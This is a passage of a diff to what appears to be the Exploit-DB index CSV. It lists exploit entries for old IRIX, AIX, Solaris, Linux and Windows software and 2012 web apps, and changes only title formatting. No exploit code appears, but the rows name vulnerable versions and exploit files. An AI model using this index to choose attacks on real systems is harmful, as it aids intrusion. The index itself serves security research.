wrap",1997-04-19,"J.A. Gutierrez",multiple,remote,0 +19298,platforms/multiple/remote/19298.txt,"SGI IRIX 6.2 cgi-bin wrap - Exploit",1997-04-19,"J.A. Gutierrez",multiple,remote,0 19299,platforms/multiple/remote/19299.txt,"SGI IRIX 6.3 - cgi-bin webdist.cgi",1997-05-06,anonymous,multiple,remote,0 -19300,platforms/aix/local/19300.txt,"IBM AIX 4.2.1 snap Insecure Temporary File Creation",1999-02-17,"Larry W. Cashdollar",aix,local,0 +19300,platforms/aix/local/19300.txt,"IBM AIX 4.2.1 snap - Insecure Temporary File Creation",1999-02-17,"Larry W. Cashdollar",aix,local,0 19301,platforms/linux/dos/19301.c,"Linux Kernel 2.0.33 - IP Fragment Overlap",1998-04-17,"Michal Zalewski",linux,dos,0 19302,platforms/linux/local/19302.c,"Linux libc 5.3.12 / RedHat Linux 4.0 / Slackware Linux 3.1 - libc NLSPATH",1998-01-19,Solar,linux,local,0 19303,platforms/multiple/remote/19303.txt,"SGI IRIX 6.4 cgi-bin handler",1997-06-16,"Razvan Dragomirescu",multiple,remote,0 -19304,platforms/irix/local/19304.txt,"SGI IRIX 6.4 inpview",1997-05-07,"Yuri Volobuev",irix,local,0 -19305,platforms/linux/local/19305.c,"RedHat Linux 5.0 msgchk",1998-01-19,"Cesar Tascon Alvarez",linux,local,0 -19306,platforms/aix/local/19306.c,"IBM AIX 4.2.1 portmir Buffer Overflow & Insecure Temporary File Creation Vulnerabilities",1997-10-29,"BM ERS Team",aix,local,0 -19307,platforms/aix/local/19307.c,"IBM AIX 4.2 ping Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 +19304,platforms/irix/local/19304.txt,"SGI IRIX 6.4 inpview - Exploit",1997-05-07,"Yuri Volobuev",irix,local,0 +19305,platforms/linux/local/19305.c,"RedHat Linux 5.0 msgchk - Exploit",1998-01-19,"Cesar Tascon Alvarez",linux,local,0 +19306,platforms/aix/local/19306.c,"IBM AIX 4.2.1 portmir - Buffer Overflow / Insecure Temporary File Creation Vulnerabilities",1997-10-29,"BM ERS Team",aix,local,0 +19307,platforms/aix/local/19307.c,"IBM AIX 4.2 ping - Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 19308,platforms/linux/dos/19308.c,"Linux Kernel 2.0 / 2.0.33 - i_count Overflow Proof of Concept",1998-01-14,"Aleph One",linux,dos,0 -19309,platforms/aix/local/19309.c,"IBM AIX 4.2 lchangelv Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 +19309,platforms/aix/local/19309.c,"IBM AIX 4.2 lchangelv - Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 19310,platforms/irix/local/19310.c,"SGI IRIX 6.4 - login",1997-05-26,"David Hedley",irix,local,0 19311,platforms/linux/local/19311.c,"RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 mailx - (1)",1998-06-20,"Alvaro Martinez Echevarria",linux,local,0 19312,platforms/linux/local/19312.c,"RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 mailx - (2)",1998-06-25,segv,linux,local,0 -19313,platforms/irix/local/19313.txt,"SGI IRIX 6.4 netprint",1997-01-04,"Yuri Volobuev",irix,local,0 +19313,platforms/irix/local/19313.txt,"SGI IRIX 6.4 netprint - Exploit",1997-01-04,"Yuri Volobuev",irix,local,0 19314,platforms/linux/local/19314.c,"RedHat Linux 5.0/5.1/5.2 / Slackware Linux 3.5 - klogd Buffer Overflow (1)",1999-02-26,"Michal Zalewski",linux,local,0 19315,platforms/linux/local/19315.c,"RedHat Linux 5.0/5.1/5.2 / Slackware Linux 3.5 - klogd Buffer Overflow (2)",1999-02-26,"Esa Etelavuori",linux,local,0 -19316,platforms/irix/remote/19316.c,"SGI IRIX 6.5.2 nsd",1999-05-31,"Jefferson Ogata",irix,remote,0 -19317,platforms/irix/local/19317.c,"SGI IRIX 5.3/6.2 ordist",1997-05-24,"Yuri Volobuev",irix,local,0 -19318,platforms/aix/local/19318.c,"SGI IRIX 6.4 permissions Buffer Overflow",1997-05-26,"David Hedley",aix,local,0 -19319,platforms/irix/local/19319.c,"SGI IRIX 5.3 pkgadjust",1996-09-23,"Hui-Hui Hu",irix,local,0 +19316,platforms/irix/remote/19316.c,"SGI IRIX 6.5.2 nsd - Exploit",1999-05-31,"Jefferson Ogata",irix,remote,0 +19317,platforms/irix/local/19317.c,"SGI IRIX 5.3/6.2 ordist - Exploit",1997-05-24,"Yuri Volobuev",irix,local,0 +19318,platforms/aix/local/19318.c,"SGI IRIX 6.4 - permissions Buffer Overflow",1997-05-26,"David Hedley",aix,local,0 +19319,platforms/irix/local/19319.c,"SGI IRIX 5.3 pkgadjust - Exploit",1996-09-23,"Hui-Hui Hu",irix,local,0 19411,platforms/bsd/local/19411.txt,"BSDI BSD/OS 4.0 /FreeBSD 3.2 /NetBSD 1.4 x86 / OpenBSD 2.5 - UFS Secure Level 1",1999-07-02,Stealth,bsd,local,0 19412,platforms/windows/local/19412.c,"Qbik WinGate 3.0 Registry",1999-02-22,Chris,windows,local,0 19410,platforms/windows/dos/19410.py,"Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 - Buffer Overflow DoS",1999-02-22,Prizm,windows,dos,0 19406,platforms/linux/webapps/19406.txt,"symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities",2012-06-27,"S2 Crew",linux,webapps,0 19321,platforms/windows/webapps/19321.txt,"IBM System Storage DS Storage Manager Profiler - Multiple Vulnerabilities",2012-06-21,LiquidWorm,windows,webapps,0 19322,platforms/windows/remote/19322.rb,"Apple iTunes 10.6.1.7 - Extended m3u Stack Buffer Overflow (Metasploit)",2012-06-21,Rh0,windows,remote,0 -19326,platforms/solaris/local/19326.txt,"Sun Solaris 7.0 procfs",1999-03-09,"Toomas Soome",solaris,local,0 -19323,platforms/windows/local/19323.c,"URL Hunter Buffer Overflow DEP Bypass",2012-06-21,Ayrbyte,windows,local,0 +19326,platforms/solaris/local/19326.txt,"Sun Solaris 7.0 procfs - Exploit",1999-03-09,"Toomas Soome",solaris,local,0 +19323,platforms/windows/local/19323.c,"URL Hunter - Buffer Overflow DEP Bypass",2012-06-21,Ayrbyte,windows,local,0 19324,platforms/php/webapps/19324.txt,"traq 2.3.5 - Multiple Vulnerabilities",2012-06-21,AkaStep,php,webapps,0 19325,platforms/php/webapps/19325.txt,"Commentics 2.0 - Multiple Vulnerabilities",2012-06-21,"Jean Pascal Pereira",php,webapps,0 19327,platforms/solaris/remote/19327.c,"Sun Solaris 2.5.1 rpc.statd rpc Call Relaying",1999-06-07,anonymous,solaris,remote,0 -19328,platforms/windows/dos/19328.txt,"Qutecom Softphone 2.2.1 Heap Overflow DoS/Crash Proof of Concept",2012-06-22,"Debasish Mandal",windows,dos,0 +19328,platforms/windows/dos/19328.txt,"Qutecom Softphone 2.2.1 - Heap Overflow DoS/Crash Proof of Concept",2012-06-22,"Debasish Mandal",windows,dos,0 19329,platforms/php/webapps/19329.txt,"agora project 2.13.1 - Multiple Vulnerabilities",2012-06-22,"Chris Russell",php,webapps,0 19330,platforms/php/webapps/19330.txt,"LimeSurvey 1.92+ build120620 - Multiple Vulnerabilities",2012-06-22,dun,php,webapps,0 19331,platforms/windows/dos/19331.txt,"ACDSee PRO 5.1 - .RLE Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 @@ -16738,20 +16734,20 @@ id,file,description,date,author,platform,type,port 19342,platforms/solaris/local/19342.c,"Solaris 2.5.1 kcms - Buffer Overflow (2)",1998-12-24,UNYUN,solaris,local,0 19343,platforms/solaris/local/19343.c,"Solaris 2.5.1 rsh socket descriptor",1997-06-19,"Alan Cox",solaris,local,0 19344,platforms/aix/local/19344.sh,"IBM AIX 3.2.5 IFS",1994-04-02,anonymous,aix,local,0 -19345,platforms/aix/local/19345.txt,"IBM AIX 4.2.1 lquerypv",1996-11-24,Aleph1,aix,local,0 +19345,platforms/aix/local/19345.txt,"IBM AIX 4.2.1 lquerypv - Exploit",1996-11-24,Aleph1,aix,local,0 19346,platforms/freebsd/local/19346.c,"FreeBSD 3.1 / Solaris 2.6 - Domain Socket",1997-06-19,"Thamer Al-Herbish",freebsd,local,0 -19347,platforms/irix/local/19347.c,"SGI IRIX 6.3 pset",1997-07-17,"Last Stage of Delirium",irix,local,0 +19347,platforms/irix/local/19347.c,"SGI IRIX 6.3 pset - Exploit",1997-07-17,"Last Stage of Delirium",irix,local,0 19348,platforms/aix/remote/19348.txt,"IBM AIX 3.2.5 - login(1)",1996-12-04,anonymous,aix,remote,0 -19349,platforms/irix/local/19349.txt,"SGI IRIX 6.4 rmail",1997-05-07,"Yuri Volobuev",irix,local,0 -19350,platforms/solaris/local/19350.sh,"Solaris 2.5.1 License Manager",1998-10-21,"Joel Eriksson",solaris,local,0 -19351,platforms/irix/local/19351.sh,"SGI IRIX 5.2/5.3 serial_ports",1994-02-02,transit,irix,local,0 +19349,platforms/irix/local/19349.txt,"SGI IRIX 6.4 rmail - Exploit",1997-05-07,"Yuri Volobuev",irix,local,0 +19350,platforms/solaris/local/19350.sh,"Solaris 2.5.1 - License Manager",1998-10-21,"Joel Eriksson",solaris,local,0 +19351,platforms/irix/local/19351.sh,"SGI IRIX 5.2/5.3 serial_ports - Exploit",1994-02-02,transit,irix,local,0 19407,platforms/windows/remote/19407.py,"Symantec PcAnywhere 12.5.0 - Login and Password Field Buffer Overflow",2012-06-27,"S2 Crew",windows,remote,0 -19353,platforms/irix/local/19353.txt,"SGI IRIX 6.4 suid_exec",1996-12-02,"Yuri Volobuev",irix,local,0 -19354,platforms/aix/local/19354.txt,"SGI IRIX 5.1/5.2 sgihelp",1996-12-02,anonymous,aix,local,0 -19355,platforms/irix/local/19355.txt,"SGI IRIX 6.4 startmidi",1997-02-09,"David Hedley",irix,local,0 +19353,platforms/irix/local/19353.txt,"SGI IRIX 6.4 suid_exec - Exploit",1996-12-02,"Yuri Volobuev",irix,local,0 +19354,platforms/aix/local/19354.txt,"SGI IRIX 5.1/5.2 sgihelp - Exploit",1996-12-02,anonymous,aix,local,0 +19355,platforms/irix/local/19355.txt,"SGI IRIX 6.4 startmidi - Exploit",1997-02-09,"David Hedley",irix,local,0 19356,platforms/irix/local/19356.txt,"SGI IRIX 6.3 Systour and OutOfBox Vulnerabilities",1996-10-30,"Tun-Hui Hu",irix,local,0 19357,platforms/irix/dos/19357.sh,"SGI IRIX 6.2 SpaceWare",1996-10-30,"J.A. Guitierrez",irix,dos,0 -19358,platforms/irix/local/19358.txt,"SGI IRIX 6.4 xfsdump",1997-05-07,"Yuri Volobuev",irix,local,0 +19358,platforms/irix/local/19358.txt,"SGI IRIX 6.4 xfsdump - Exploit",1997-05-07,"Yuri Volobuev",irix,local,0 19359,platforms/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4 / Windows NT 3.5.1/SP1/SP2/SP3/SP4/SP5 - Screensaver",1999-03-10,"Cybermedia Software Private Limited",windows,local,0 19360,platforms/linux/local/19360.c,"Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - vsyslog() Buffer Overflow",1997-12-21,"Solar Designer",linux,local,0 19361,platforms/windows/remote/19361.txt,"Microsoft IIS 3.0/4.0 - Double Byte Code Page",1999-06-24,Microsoft,windows,remote,0 @@ -16760,7 +16756,7 @@ id,file,description,date,author,platform,type,port 19364,platforms/netware/local/19364.txt,"Novell Netware 4.1/4.11 - SP5B Remote.NLM Weak Encryption",1999-04-09,dreamer,netware,local,0 19365,platforms/netware/remote/19365.txt,"Novell Netware 4.1/4.11 - SP5B NDS Default Rights",1999-04-09,"Simple Nomad",netware,remote,0 19384,platforms/linux/local/19384.c,"Debian Linux 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",linux,local,0 -19368,platforms/multiple/dos/19368.sh,"Lotus Domino 4.6.1/4.6.4 Notes SMTPA MTA Mail Relay",1999-06-15,"Robert Lister",multiple,dos,0 +19368,platforms/multiple/dos/19368.sh,"Lotus Domino 4.6.1/4.6.4 Notes - SMTPA MTA Mail Relay",1999-06-15,"Robert Lister",multiple,dos,0 19369,platforms/windows/remote/19369.rb,"Adobe Flash Player - Object Type Confusion",2012-06-25,Metasploit,windows,remote,0 19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x / 5.0 - Buffer Overflow",1999-06-25,KSR[T],linux,local,0 19371,platforms/linux/local/19371.c,"VMware 1.0.1 - Buffer Overflow",1999-06-25,funkysh,linux,local,0 @@ -16768,35 +16764,35 @@ id,file,description,date,author,platform,type,port 19373,platforms/linux/local/19373.c,"Debian Linux 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat Linux 5.2 i386 / S.u.S.E. Linux 6.1 - Lsof Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local,0 19374,platforms/linux/local/19374.c,"Debian Linux 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat Linux 5.2 i386 / S.u.S.E. Linux 6.1 - Lsof Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0 19383,platforms/multiple/remote/19383.txt,"Qbik WinGate Standard 3.0.5 Log Service Directory Traversal",1999-02-22,eEYe,multiple,remote,0 -19382,platforms/multiple/dos/19382.txt,"Ipswitch IMail 5.0 Whois32 Daemon Buffer Overflow DoS",1999-03-01,"Marc of eEye",multiple,dos,0 +19382,platforms/multiple/dos/19382.txt,"Ipswitch IMail 5.0 - Whois32 Daemon Buffer Overflow DoS",1999-03-01,"Marc of eEye",multiple,dos,0 19376,platforms/windows/local/19376.txt,"Microsoft IIS 2.0/3.0/4.0 - ISAPI GetExtensionVersion()",1999-03-08,"Fabien Royer",windows,local,0 -19377,platforms/multiple/dos/19377.txt,"Ipswitch IMail 5.0 Imapd Buffer Overflow DoS",1999-03-01,"Marc of eEye",multiple,dos,0 -19378,platforms/multiple/dos/19378.txt,"Ipswitch IMail 5.0 LDAP Buffer Overflow DoS",1999-03-01,"Marc of eEye",multiple,dos,0 -19379,platforms/multiple/dos/19379.txt,"Ipswitch IMail 5.0 IMonitor Buffer Overflow DoS",1999-03-01,"Marc of eEye",multiple,dos,0 -19380,platforms/multiple/dos/19380.txt,"Ipswitch IMail 5.0/6.0 Web Service Buffer Overflow DoS",1999-03-01,"Marc of eEye",multiple,dos,0 +19377,platforms/multiple/dos/19377.txt,"Ipswitch IMail 5.0 - Imapd Buffer Overflow DoS",1999-03-01,"Marc of eEye",multiple,dos,0 +19378,platforms/multiple/dos/19378.txt,"Ipswitch IMail 5.0 - LDAP Buffer Overflow DoS",1999-03-01,"Marc of eEye",multiple,dos,0 +19379,platforms/multiple/dos/19379.txt,"Ipswitch IMail 5.0 - IMonitor Buffer Overflow DoS",1999-03-01,"Marc of eEye",multiple,dos,0 +19380,platforms/multiple/dos/19380.txt,"Ipswitch IMail 5.0/6.0 - Web Service Buffer Overflow DoS",1999-03-01,"Marc of eEye",multiple,dos,0 19393,platforms/windows/dos/19393.py,"Able2Doc and Able2Doc Professional 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19394,platforms/asp/webapps/19394.txt,"Parodia 6.8 - employer-profile.asp SQL Injection",2012-06-25,"Carlos Mario Penagos Hollmann",asp,webapps,0 19398,platforms/php/webapps/19398.txt,"WordPress Fancy Gallery Plugin 1.2.4 - Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 -19408,platforms/php/webapps/19408.txt,"Zend Framework Local File Disclosure",2012-06-27,"SEC Consult",php,webapps,0 +19408,platforms/php/webapps/19408.txt,"Zend Framework - Local File Disclosure",2012-06-27,"SEC Consult",php,webapps,0 19403,platforms/php/webapps/19403.rb,"SugarCRM 6.3.1 - unserialize() PHP Code Execution",2012-06-26,Metasploit,php,webapps,0 29039,platforms/windows/dos/29039.py,"Kerio MailServer 5.x/6.x - Remote LDAP Denial of Service",2006-11-15,"Evgeny Legerov",windows,dos,0 19409,platforms/windows/dos/19409.txt,"Sielco Sistemi Winlog 2.07.16 - Multiple Vulnerabilities",2012-06-27,"Luigi Auriemma",windows,dos,0 19414,platforms/windows/dos/19414.c,"Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 (2)",1999-07-03,klepto,windows,dos,0 19415,platforms/windows/dos/19415.c,"Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 (3)",1999-04-06,"Rob Mosher",windows,dos,0 -19416,platforms/windows/dos/19416.c,"Netscape Enterprise Server 3.6 SSL Buffer Overflow DoS",1999-07-06,"Arne Vidstrom",windows,dos,0 +19416,platforms/windows/dos/19416.c,"Netscape Enterprise Server 3.6 - SSL Buffer Overflow DoS",1999-07-06,"Arne Vidstrom",windows,dos,0 19417,platforms/osx/local/19417.txt,"Apple Mac OS 8 8.6 - Weak Password Encryption",1999-07-10,"Dawid adix Adamski",osx,local,0 -19418,platforms/aix/local/19418.txt,"IBM AIX 4.3.1 adb",1999-07-12,"GZ Apple",aix,local,0 +19418,platforms/aix/local/19418.txt,"IBM AIX 4.3.1 adb - Exploit",1999-07-12,"GZ Apple",aix,local,0 19419,platforms/linux/local/19419.c,"Linux Kernel 2.0.37 - Segment Limit Local Root",1999-07-13,Solar,linux,local,0 19420,platforms/multiple/remote/19420.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (1)",1999-07-13,"Last Stage of Delirium",multiple,remote,0 19421,platforms/multiple/remote/19421.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)",1999-07-13,jGgM,multiple,remote,0 -19422,platforms/linux/local/19422.txt,"BMC Software Patrol 3.2.5 Patrol SNMP Agent File Creation/Permission",1999-07-14,"Andrew Alness",linux,local,0 +19422,platforms/linux/local/19422.txt,"BMC Software Patrol 3.2.5 - Patrol SNMP Agent File Creation/Permission",1999-07-14,"Andrew Alness",linux,local,0 19423,platforms/multiple/dos/19423.c,"Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",multiple,dos,0 19424,platforms/windows/remote/19424.pl,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (1)",1999-07-19,"rain forest puppy",windows,remote,0 19425,platforms/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (2)",1999-07-19,"Wanderley J. Abreu Jr",windows,local,0 19426,platforms/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0 / SGI IRIX 6.5.4 / SGI UNICOS 10.0 6 - arrayd.auth Default Configuration",1999-07-19,"Last Stage of Delirium",multiple,remote,0 -19427,platforms/osx/local/19427.txt,"Apple At Ease 5.0",1999-05-13,"Tim Conrad",osx,local,0 -19428,platforms/linux/local/19428.c,"Samba Pre-2.0.5",1999-07-21,"Gerald Britton",linux,local,0 -19429,platforms/linux/local/19429.sh,"Rational Software ClearCase for Unix 3.2 ClearCase SUID",1999-05-02,Mudge,linux,local,0 +19427,platforms/osx/local/19427.txt,"Apple At Ease 5.0 - Exploit",1999-05-13,"Tim Conrad",osx,local,0 +19428,platforms/linux/local/19428.c,"Samba < 2.0.5 - Exploit",1999-07-21,"Gerald Britton",linux,local,0 +19429,platforms/linux/local/19429.sh,"Rational Software ClearCase for Unix 3.2 - ClearCase SUID",1999-05-02,Mudge,linux,local,0 19430,platforms/multiple/local/19430.txt,"GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage Vulnerabilities",1999-07-25,"Pawel Wilk",multiple,local,0 19431,platforms/php/webapps/19431.txt,"webERP 4.08.1 - Local/Remote File Inclusion",2012-06-28,dun,php,webapps,0 19432,platforms/jsp/webapps/19432.rb,"Openfire 3.6.0a - Admin Console Authentication Bypass",2012-06-28,Metasploit,jsp,webapps,0 @@ -16805,15 +16801,15 @@ id,file,description,date,author,platform,type,port 19435,platforms/windows/remote/19435.html,"Microsoft JET 3.5/3.51/4.0 VBA Shell",1999-07-29,BrootForce,windows,remote,0 19436,platforms/hardware/dos/19436.txt,"Check Point Software Firewall-1 3.0/1 4.0 - Table Saturation Denial of Service",1999-07-29,"Lance Spitzner",hardware,dos,0 19437,platforms/osx/local/19437.txt,"ELS Screen to Screen 1.0 - Multiple Password Vulnerabilities",1999-07-29,"Prozaq of mSec",osx,local,0 -19438,platforms/osx/local/19438.txt,"Ogopogo Autothenticate 1.1.5 Weak Password Encryption",1999-07-29,"Prozaq of mSec",osx,local,0 -19439,platforms/osx/local/19439.txt,"Power On Software On Guard for MacOS 3.2 Emergency Password",1999-07-29,"Prozaq of mSec",osx,local,0 +19438,platforms/osx/local/19438.txt,"Ogopogo Autothenticate 1.1.5 - Weak Password Encryption",1999-07-29,"Prozaq of mSec",osx,local,0 +19439,platforms/osx/local/19439.txt,"Power On Software On Guard for MacOS 3.2 - Emergency Password",1999-07-29,"Prozaq of mSec",osx,local,0 19440,platforms/windows/local/19440.c,"Microsoft Windows NT 4.0/SP 1/SP 2/Sp 3/SP 4/SP 5 - Malformed Dialer Entry",1999-07-30,"David Litchfield",windows,local,0 19441,platforms/hardware/dos/19441.c,"Network Associates Gauntlet Firewall 5.0 - Denial of Service Attack",1999-07-30,"Mike Frantzen",hardware,dos,0 19442,platforms/windows/remote/19442.html,"Compaq Java Applet for Presario SpawnApp",1998-11-28,"Frank Farance",windows,remote,0 19443,platforms/multiple/remote/19443.txt,"Netscape Enterprise Server 3.51/3.6 - JHTML View Source",1999-07-30,"David Litchfield",multiple,remote,0 19444,platforms/hardware/remote/19444.txt,"Network Security Wizards Dragon-Fire IDS 1.0",1999-08-05,"Stefan Lauda",hardware,remote,0 19445,platforms/windows/dos/19445.txt,"Microsoft FrontPage Personal WebServer 1.0 - PWS DoS",1999-08-08,Narr0w,windows,dos,0 -19446,platforms/multiple/dos/19446.pl,"WebTrends Enterprise Reporting Server 1.5 Negative Content Length DoS",1999-08-08,rpc,multiple,dos,0 +19446,platforms/multiple/dos/19446.pl,"WebTrends Enterprise Reporting Server 1.5 - Negative Content Length DoS",1999-08-08,rpc,multiple,dos,0 19447,platforms/multiple/local/19447.c,"NetBSD 1.4 / OpenBSD 2.5 /Solaris 7.0 profil(2) - Exploit",1999-08-09,"Ross Harvey",multiple,local,0 19448,platforms/windows/remote/19448.c,"ToxSoft NextFTP 1.82 - Buffer Overflow",1999-08-03,UNYUN,windows,remote,0 19449,platforms/windows/remote/19449.c,"Fujitsu Chocoa 1.0 beta7R - 'Topic' Buffer Overflow",1999-08-03,UNYUN,windows,remote,0 @@ -16838,7 +16834,7 @@ id,file,description,date,author,platform,type,port 19469,platforms/linux/local/19469.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E. Linux 6.0/6.1 - Cron Buffer Overflow (1)",1999-08-30,Akke,linux,local,0 19470,platforms/linux/local/19470.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E. Linux 6.0/6.1 - Cron Buffer Overflow (2)",1999-08-25,jbowie,linux,local,0 19471,platforms/windows/dos/19471.html,"Microsoft Internet Explorer 5.0 - HTML Form Control DoS",1999-08-27,"Neon Bunny",windows,dos,0 -19472,platforms/windows/local/19472.txt,"IBM GINA for NT 1.0 Privilege Escalation",1999-08-23,"Frank Pikelner",windows,local,0 +19472,platforms/windows/local/19472.txt,"IBM GINA for NT 1.0 - Privilege Escalation",1999-08-23,"Frank Pikelner",windows,local,0 19473,platforms/windows/local/19473.txt,"Microsoft Internet Explorer 5.0 - FTP Password Storage",1999-08-25,"Makoto Shiotsuki",windows,local,0 19474,platforms/linux/local/19474.txt,"Caldera OpenLinux 2.2 / Debian 2.1/2.2 / RedHat 6.0 - Vixie Cron MAILTO Sendmail",1999-08-25,"Olaf Kirch",linux,local,0 19475,platforms/linux/remote/19475.c,"ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1)",1999-08-17,"babcia padlina ltd",linux,remote,0 @@ -16848,45 +16844,45 @@ id,file,description,date,author,platform,type,port 19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (2)",1999-08-30,c0nd0r,unix,remote,0 19480,platforms/multiple/local/19480.c,"ISC INN 2.2 / RedHat Linux 6.0 - inews Buffer Overflow",1999-09-02,bawd,multiple,local,0 19481,platforms/php/webapps/19481.txt,"WordPress Paid Business Listings 1.0.2 Plugin - Blind SQL Injection",2012-06-30,"Chris Kellum",php,webapps,0 -19482,platforms/multiple/dos/19482.txt,"GIMP 2.8.0 FIT File Format DoS",2012-06-30,"Joseph Sheridan",multiple,dos,0 -19483,platforms/windows/dos/19483.txt,"IrfanView JLS Formats PlugIn Heap Overflow",2012-06-30,"Joseph Sheridan",windows,dos,0 +19482,platforms/multiple/dos/19482.txt,"GIMP 2.8.0 - .FIT File Format DoS",2012-06-30,"Joseph Sheridan",multiple,dos,0 +19483,platforms/windows/dos/19483.txt,"IrfanView JLS Formats PlugIn - Heap Overflow",2012-06-30,"Joseph Sheridan",windows,dos,0 19484,platforms/windows/remote/19484.rb,"HP Data Protector - Create New Folder Buffer Overflow",2012-07-01,Metasploit,windows,remote,3817 19485,platforms/linux/local/19485.c,"Martin Stover Mars NWE 0.99 - Buffer Overflow",1999-08-31,"Przemyslaw Frasunek",linux,local,0 -19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 EMBED Buffer Overflow",1999-09-02,"R00t Zer0",windows,remote,0 +19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 - EMBED Buffer Overflow",1999-09-02,"R00t Zer0",windows,remote,0 19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4.0/5.0 - ActiveX 'Eyedog'",1999-08-21,"Shane Hird's",windows,remote,0 19488,platforms/bsd/dos/19488.c,"FreeBSD 5.0 / NetBSD 1.4.2 / OpenBSD 2.7 - setsockopt() DoS",1999-09-05,"L. Sassaman",bsd,dos,0 19489,platforms/windows/dos/19489.txt,"Microsoft Windows NT 4.0 - DCOM Server",1999-09-08,Mnemonix,windows,dos,0 19490,platforms/windows/remote/19490.txt,"Microsoft Internet Explorer 4.0.1/5.0 - Import/Export Favorites",1999-09-10,"Georgi Guninski",windows,remote,0 -19491,platforms/windows/remote/19491.txt,"BindView HackerShield 1.0/1.1 HackerShield AgentAdmin Password",1999-09-10,anonymous,windows,remote,0 +19491,platforms/windows/remote/19491.txt,"BindView HackerShield 1.0/1.1 - HackerShield AgentAdmin Password",1999-09-10,anonymous,windows,remote,0 19492,platforms/multiple/remote/19492.txt,"Microsoft Internet Explorer 5.0 / Netscape Communicator 4.0/4.5/4.6 - Javascript STYLE",1999-09-13,"Georgi Guninski",multiple,remote,0 19493,platforms/multiple/remote/19493.txt,"Netscape Enterprise Server 3.51/3.6 SP2 Accept Buffer Overflow",1999-09-13,"Nobuo Miwa",multiple,remote,0 -19494,platforms/windows/remote/19494.c,"NetcPlus SmartServer 3.5.1 SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 -19495,platforms/windows/remote/19495.c,"Computalynx CMail 2.3 SP2/2.4 SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 -19496,platforms/windows/remote/19496.c,"FuseWare FuseMail 2.7 POP Mail Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 +19494,platforms/windows/remote/19494.c,"NetcPlus SmartServer 3.5.1 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 +19495,platforms/windows/remote/19495.c,"Computalynx CMail 2.3 SP2/2.4 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 +19496,platforms/windows/remote/19496.c,"FuseWare FuseMail 2.7 - POP Mail Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 19497,platforms/multiple/local/19497.c,"DIGITAL UNIX 4.0 d/e/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 - Buffer Overflow",1999-09-13,"Job de Haas of ITSX",multiple,local,0 19498,platforms/multiple/local/19498.sh,"Common Desktop Environment 2.1 20 / Solaris 7.0 - dtspcd",1999-09-13,"Job de Haas of ITSX",multiple,local,0 -19499,platforms/linux/local/19499.c,"SCO Open Server 5.0.5 X Library Buffer Overflow (1)",1999-09-09,"Brock Tellier",linux,local,0 -19500,platforms/linux/local/19500.c,"SCO Open Server 5.0.5 X Library Buffer Overflow (2)",1999-06-21,"The Dark Raver of CPNE",linux,local,0 +19499,platforms/linux/local/19499.c,"SCO Open Server 5.0.5 - X Library Buffer Overflow (1)",1999-09-09,"Brock Tellier",linux,local,0 +19500,platforms/linux/local/19500.c,"SCO Open Server 5.0.5 - X Library Buffer Overflow (2)",1999-06-21,"The Dark Raver of CPNE",linux,local,0 19501,platforms/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 / SunOS 4.1.4 - BoF",1999-09-13,"Job de Haas of ITSX",linux,local,0 19502,platforms/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 - RASMAN 